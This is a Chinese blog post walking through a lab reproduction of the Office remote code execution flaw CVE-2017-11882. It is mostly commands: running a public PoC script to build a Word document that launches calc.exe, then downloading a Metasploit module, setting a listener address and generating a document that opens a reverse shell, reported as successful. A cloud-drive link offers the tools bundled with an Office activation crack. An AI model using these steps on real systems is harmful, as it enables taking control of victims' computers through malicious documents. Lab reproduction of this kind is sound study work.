美文网首页安全技术
Office远程代码执行漏洞(CVE-2017-11882)复现

Office远程代码执行漏洞(CVE-2017-11882)复现

作者: 二潘 | 来源:发表于2017-12-28 17:05 被阅读18次

    1.今天看到有复现的文章,看了好几篇决定本地测试该漏洞

    利用工具清单:

    a) tcp反弹:kali 172.16.1.204

    b) 安装office2013的系统:win7 172.16.253.4

    1. Msf 用到的 Poc

    2. office2013、激活工具

    3. win7旗舰版ISO镜像

    以上工具已经打包好,下载地址:

    链接:http://pan.baidu.com/s/1o8635Om  密码:xl91

    Microsoft Office再次爆出内存破坏漏洞,CVEID CVE-2017-11882,攻击者可以利用此问题,在当前登录用户的上下文中执行任意代码。失败的开发尝试可能会导致拒绝服务条件。

    漏洞触发的原理http://www.freebuf.com/articles/web/155304.html

    受影响版本包括,Office 2016、Office 2013、Office 2010、Office 2007的相关版本。

    POC地址:https://github.com/Ridter/CVE-2017-11882/

    分割符--------------------------------------------------------------------

    上面都是废话,进入正题

    1、简单的生成弹计算器的doc文件

    命令:python Command43b_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

    生成的doc文件直接打开就可以弹出计算器了

    2、生成可以反弹shell的doc文件

    这首先下载metasploit的攻击模块

    wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/39a4d193a17c6f85846a58a429c0914f542bded2/modules/exploits/windows/fileformat/office_ms17_11882.rb

    之后移动到下面这个目录

    mv office_ms17_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat

    接着启动metasploit

    输入

    use exploit/windows/fileformat/office_ms17_11882

    设置生成的文件名字

    set filename bboysoul.doc

    设置主机ip

    set lhost 192.168.1.102

    开始攻击

    exploit

    回连成功,shell

    exit

    相关文章

      网友评论

        本文标题:Office远程代码执行漏洞(CVE-2017-11882)复现

        本文链接:https://www.haomeiwen.com/subject/gjabbxtx.html